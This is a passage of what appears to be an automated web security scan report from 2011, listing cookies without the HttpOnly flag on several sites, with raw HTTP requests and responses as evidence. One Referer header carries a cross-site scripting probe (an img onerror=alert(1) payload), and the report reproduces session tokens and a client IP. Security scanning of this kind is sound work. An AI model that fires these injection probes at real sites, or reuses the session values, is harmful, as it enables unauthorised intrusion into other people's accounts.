HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:36:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A23%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:23 GMT;path=/ Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:23 GMT;path=/ Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:23 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sec.cfm HTTP/1.1 Host: ir.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:36:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A01%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:01 GMT;path=/ Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:01 GMT;path=/ Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:01 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /stockquote.cfm HTTP/1.1 Host: ir.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:36:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A02%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:03 GMT;path=/ Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:03 GMT;path=/ Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:03 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /aid/3760177095415339810/bc.chat?cwdid=1954365562430760092&wdid=798708614246318013&rdid=1201083812220968228&vr=&vn=&vi=&ve=&vp=&iq=&curl= HTTP/1.1 Host: livechat.boldchat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Resin/2.1.17 Cache-Control: no-cache,no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://my.boldchat.com/w3c/p3p.xml" Set-Cookie: bc-visitor-id=798708614246318013=948822557773872607; domain=.boldchat.com; path=/; expires=Fri, 03-Feb-2012 19:47:54 GMT Set-Cookie: bc-visit-id=798708614246318013=9223372036839677808; domain=.boldchat.com; path=/ Set-Cookie: JSESSIONID=a_SsnwztJaxd; path=/ Content-Type: text/html; charset=utf-8 Date: Thu, 03 Feb 2011 19:47:53 GMT Content-Length: 11752
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /aid/3760177095415339810/bc.chat HTTP/1.1 Host: livechat.boldchat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Resin/2.1.17 Cache-Control: no-cache,no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://my.boldchat.com/w3c/p3p.xml" Set-Cookie: bc-visitor-id=3760177095415339810=7851714395809697412; domain=.boldchat.com; path=/; expires=Fri, 03-Feb-2012 20:32:21 GMT Set-Cookie: bc-visit-id=3760177095415339810=9223372036839688863; domain=.boldchat.com; path=/ Set-Cookie: JSESSIONID=aP-3JlTQvoC6; path=/ Content-Type: text/html; charset=utf-8 Date: Thu, 03 Feb 2011 20:32:21 GMT Content-Length: 101191
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: mad4milk.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:48:05 GMT Server: Apache/2.0.54 X-Powered-By: PHP/5.2.14 Set-Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2264dc0b4145e45d69276a4c3c70a5981e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1296762487%3Bs%3A10%3A%22last_visit%22%3Bi%3A0%3B%7D; expires=Thu, 03-Feb-2011 21:48:07 GMT; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 2866
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /acdwsweb/ACDwsAction.do HTTP/1.1 Host: mktws.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /CammsServlet?assetid=198 HTTP/1.1 Host: my.supermedia.com Proxy-Connection: keep-alive Referer: http://www.supermedia.com/social-responsibility/corporate-governance Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763650|check#true#1296761850; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/jobs/find-jobs/q-Honda+Research+Development+America/x22 HTTP/1.1 Host: nowhiringtoday.jobamatic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/lgpl-license.php HTTP/1.1 Host: opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/mit-license.php HTTP/1.1 Host: opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ref/lppb.asp HTTP/1.1 Host: solutions.liveperson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Connection: close Date: Thu, 03 Feb 2011 17:52:33 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Location: pbl.asp Content-Length: 128 Content-Type: text/html Set-Cookie: visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/ Set-Cookie: ASPSESSIONIDQSDTDCQS=DJKOGOICKIGDBAFDJAHHMONP; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="pbl.asp">here</a>.</body>
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /dispatch/?publisher=veoh&list-id=rbox-blended&format=json&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video&item-url=http%3A//www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http%3A//burp/show/11 HTTP/1.1 Host: trc.taboolasyndication.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 20:52:28 GMT Server: Jetty(6.1.7) P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM" Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/plain; charset=utf-8 Set-Cookie: taboola_user_id=4c66d115-8de0-434d-9ff5-5470c9ca620e;Path=/;Expires=Fri, 03-Feb-12 20:52:28 GMT Set-Cookie: taboola_session_id_veoh=v1_34827fb6eada2a9b2f6ab3438324282f_4c66d115-8de0-434d-9ff5-5470c9ca620e_1296766348_1296766348;Path=/ Set-Cookie: JSESSIONID=.prod2-f2;Path=/ Set-Cookie: taboola_wv_veoh=4501877959146416130;Path=/;Expires=Fri, 03-Feb-12 20:52:28 GMT Set-Cookie: taboola_rii_veoh=7442879704085952417_1039225080754099931;Path=/;Expires=Fri, 03-Feb-12 20:52:28 GMT Vary: Accept-Encoding Connection: close Content-Length: 9148
guest_id=129676075859926793; path=/; expires=Sat, 05 Mar 2011 19:19:18 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 302 Found Date: Thu, 03 Feb 2011 19:19:18 GMT Server: hi Status: 302 Found Location: http://twitter.com/login?redirect_after_login=%2Fhome X-Runtime: 0.00233 Content-Type: text/html; charset=utf-8 Content-Length: 119 Cache-Control: no-cache, max-age=300 Set-Cookie: k=173.193.214.243.1296760758598311; path=/; expires=Thu, 10-Feb-11 19:19:18 GMT; domain=.twitter.com Set-Cookie: guest_id=129676075859926793; path=/; expires=Sat, 05 Mar 2011 19:19:18 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCEnh9uwtAToOcmV0dXJuX3RvIhxodHRwOi8v%250AdHdpdHRlci5jb20vaG9tZToHaWQiJWY0NWVhYTM0NjI3NmM1ODJiYmEzMGZj%250AMjM3N2UyYjkzIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6%250ARmxhc2hIYXNoewAGOgpAdXNlZHsA--b39156638e0fd7387d15e0a4ebb19b4b1becdcf0; domain=.twitter.com; path=/ Expires: Thu, 03 Feb 2011 19:24:18 GMT X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<html><body>You are being <a href="http://twitter.com/login?redirect_after_login=%2Fhome">redirected</a>.</body></html>
guest_id=129676075327739820; path=/; expires=Sat, 05 Mar 2011 19:19:13 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /supermedia HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:19:13 GMT Server: hi Status: 200 OK X-Transaction: 1296760753-13380-14514 ETag: "980457e03ec8c8ddfb67fd40ecd97bea" Last-Modified: Thu, 03 Feb 2011 19:19:13 GMT X-Runtime: 0.01072 Content-Type: text/html; charset=utf-8 Content-Length: 50851 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296760753269662; path=/; expires=Thu, 10-Feb-11 19:19:13 GMT; domain=.twitter.com Set-Cookie: guest_id=129676075327739820; path=/; expires=Sat, 05 Mar 2011 19:19:13 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCH%252FM9uwtAToHaWQiJTRmZjcyZDZjOTYwYzFj%250ANDkxYTkzZDhhNmVhN2Q2OGNhIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--100f876db5da30de78a91b22d9b5e99bb4d21a14; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /12948/watch-robo-telugu-movie-online/x22 HTTP/1.1 Host: videos.smartdesis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:32:37 GMT Server: Apache X-Powered-By: PHP/5.2.8 Vary: Cookie X-Pingback: http://videos.smartdesis.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=1190ec8918d40851363fa60d5b1876bc; path=/ Last-Modified: Thu, 03 Feb 2011 20:32:37 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 395
<div id="content">
<div class="post"> <h2>Error 404 - Not Found</h2>
<div class="entry"> <p>Sorry, the page that you are looking for does not exist.</p> </div><!--/entr ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /12962/watch-mahesh-khaleja-movie-online-tc-rip/x22 HTTP/1.1 Host: videos.smartdesis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:32:42 GMT Server: Apache X-Powered-By: PHP/5.2.8 Vary: Cookie X-Pingback: http://videos.smartdesis.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=f70cf1b1d146bbdac6f6e4323000a5a0; path=/ Last-Modified: Thu, 03 Feb 2011 20:32:43 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 395
<div id="content">
<div class="post"> <h2>Error 404 - Not Found</h2>
<div class="entry"> <p>Sorry, the page that you are looking for does not exist.</p> </div><!--/entr ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /13039/watch-ntrs-brindavanam-movie-online-tc-rip/x22 HTTP/1.1 Host: videos.smartdesis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:32:38 GMT Server: Apache X-Powered-By: PHP/5.2.8 Vary: Cookie X-Pingback: http://videos.smartdesis.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=c8a61672d2ee972f173196ceee739cc4; path=/ Last-Modified: Thu, 03 Feb 2011 20:32:40 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 395
<div id="content">
<div class="post"> <h2>Error 404 - Not Found</h2>
<div class="entry"> <p>Sorry, the page that you are looking for does not exist.</p> </div><!--/entr ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /13201/watch-rakht-charitra-2-movie-online/x22 HTTP/1.1 Host: videos.smartdesis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:32:37 GMT Server: Apache X-Powered-By: PHP/5.2.8 Vary: Cookie X-Pingback: http://videos.smartdesis.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=ea0ddc1f107ac0ebee15071a4b6732b0; path=/ Last-Modified: Thu, 03 Feb 2011 20:32:37 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 395
<div id="content">
<div class="post"> <h2>Error 404 - Not Found</h2>
<div class="entry"> <p>Sorry, the page that you are looking for does not exist.</p> </div><!--/entr ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hindi-online-movies-index/x22 HTTP/1.1 Host: videos.smartdesis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:32:35 GMT Server: Apache X-Powered-By: PHP/5.2.8 Vary: Cookie X-Pingback: http://videos.smartdesis.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=7456e574e55fb97ae5eb9ad3caf48919; path=/ Last-Modified: Thu, 03 Feb 2011 20:32:36 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 395
<div id="content">
<div class="post"> <h2>Error 404 - Not Found</h2>
<div class="entry"> <p>Sorry, the page that you are looking for does not exist.</p> </div><!--/entr ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /page/2/x22 HTTP/1.1 Host: videos.smartdesis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:32:46 GMT Server: Apache X-Powered-By: PHP/5.2.8 Vary: Cookie X-Pingback: http://videos.smartdesis.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=4a22e9dc4b28418100a379012fe5689e; path=/ Last-Modified: Thu, 03 Feb 2011 20:32:46 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 395
<div id="content">
<div class="post"> <h2>Error 404 - Not Found</h2>
<div class="entry"> <p>Sorry, the page that you are looking for does not exist.</p> </div><!--/entr ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tamil-online-movies-index/x22 HTTP/1.1 Host: videos.smartdesis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:32:46 GMT Server: Apache X-Powered-By: PHP/5.2.8 Vary: Cookie X-Pingback: http://videos.smartdesis.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=080d4866fbd5b5816cc5bbde5d18c081; path=/ Last-Modified: Thu, 03 Feb 2011 20:32:46 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 395
<div id="content">
<div class="post"> <h2>Error 404 - Not Found</h2>
<div class="entry"> <p>Sorry, the page that you are looking for does not exist.</p> </div><!--/entr ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /telugu-online-movies-index-a/x22 HTTP/1.1 Host: videos.smartdesis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:32:35 GMT Server: Apache X-Powered-By: PHP/5.2.8 Vary: Cookie X-Pingback: http://videos.smartdesis.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=4c1e6e6a8f7ca1c6adde18d7254993a5; path=/ Last-Modified: Thu, 03 Feb 2011 20:32:36 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 395
<div id="content">
<div class="post"> <h2>Error 404 - Not Found</h2>
<div class="entry"> <p>Sorry, the page that you are looking for does not exist.</p> </div><!--/entr ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /x22 HTTP/1.1 Host: videos.smartdesis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:32:35 GMT Server: Apache X-Powered-By: PHP/5.2.8 Vary: Cookie X-Pingback: http://videos.smartdesis.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=d63972255e4dc639aef9ed15da38a8a8; path=/ Last-Modified: Thu, 03 Feb 2011 20:32:35 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 395
<div id="content">
<div class="post"> <h2>Error 404 - Not Found</h2>
<div class="entry"> <p>Sorry, the page that you are looking for does not exist.</p> </div><!--/entr ...[SNIP]...
The following cookies were issued by the application and do not have the HttpOnly flag set:
session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=176-9787580-1042565; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /SmartDraw-com-SDS11-SmartDraw-2010/dp/B002OG5QUC/x22 HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:48:21 GMT Server: Server x-amz-id-1: 1KMV2BXDN94S7KQ0JZ7S p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: q5mVjA3yFvZi2IuxLAukAm69vnbnuFICbsgIGuLZMtThRGfrgK3+KrMswERBq2Ak Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=176-9787580-1042565; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Content-Length: 350615
The following cookies were issued by the application and do not have the HttpOnly flag set:
session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=183-0423924-6403059; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /s/ HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:48:21 GMT Server: Server x-amz-id-1: 1B5Q0P8RKVGQFA9NY3SE p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: nI6zZw+w2fEj6f+WxBnPsVapnrhlNWadEc8XUA04/cH3a6X/znrumVfUTZLfgypT Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=183-0423924-6403059; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Content-Length: 83315
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.atlastravelweb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68752 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDQSCCAAQS=KOLLNFNAIMDDAJHLAICANGDC; path=/ X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 21:48:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
